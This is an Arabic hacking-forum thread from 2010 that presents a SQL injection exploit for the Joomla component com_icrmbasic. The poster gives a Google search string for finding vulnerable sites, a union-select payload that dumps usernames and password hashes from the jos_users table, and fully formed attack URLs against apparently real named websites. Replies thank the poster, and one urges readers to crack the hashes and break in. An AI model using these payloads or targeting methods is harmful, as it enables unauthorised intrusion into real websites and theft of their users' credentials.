ثغرة في سكربت Joomla Component com_ircmbasic

MATRIX ALGERIA · 5 يناير 2010

السلام عليكم ايها العناكب انشاء الله جاهزين للثغرة جديدة
------
نبدا باسم الله

اولا نروح على قووقل
www.google.com

نقوم بالبحث على

PHP:

 inurl:"com_icrmbasic"

سوف تخرج مواقع كثيرة مالعمل اذا....اهه الاستغلال

PHP:

-10+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12
,13,14,15,16,17,18,19,20,21,22,23,24+from+jos_users--

يعني يصبح الموقع على الشكل التالي

PHP:

http://www.isygen.com/index.php?option=com_icrmbasicdemo&v672=Contacts&v669
=v694&v675=oab&v660=main&v656=-10+union+select+1,concat_ws(0x3a,username,pa
ssword),3,password,username,6,7,8,9,10,11,12,13,14,15,16,17,18,19,version()
tukulesto,21,22,23,24+from+jos_users--&v658=en-GB&Itemid=483

اليكم مثال مجرب عليه

http://www.cosmohotel.ro/index.php?option=com_icrmbasic&p4=ProductUnitTypes&p1=m7&Itemid=2

الموضوع الاصلي : الشبكة العنكبوتية الاحترافية الشرح من اعداد matrix algeria
نرجو حفظ الحقوق

KaLa$nikoV · 5 يناير 2010

ماشاء الله عليك

مشكور ع الثغره

يلا فكو هاشات واخترقو

M!M0 · 6 يناير 2010

مشكووور على الطرح أخي

Hαcĸer'ѕ Kιɴɢ · 7 أبريل 2010

موفق بإذن الله ... لك مني أجمل تحية .

Dr.NaNo · 7 أبريل 2010

مشكور ياغالي على الثغرة .

تحياتي لك

ثغرة في سكربت Joomla Component com_ircmbasic

السلام عليكم ايها العناكب انشاء الله جاهزين للثغرة جديدة ------ نبدا باسم الله اولا نروح على قووقل www.google.com نقوم بالبحث على...

MATRIX ALGERIA

New Member

KaLa$nikoV

<b><font color="DarkRed" size="2">VBSPIDERS TEAM</

M!M0

New Member

Hαcĸer'ѕ Kιɴɢ

:: Interactive Developer ::

Dr.NaNo

New Member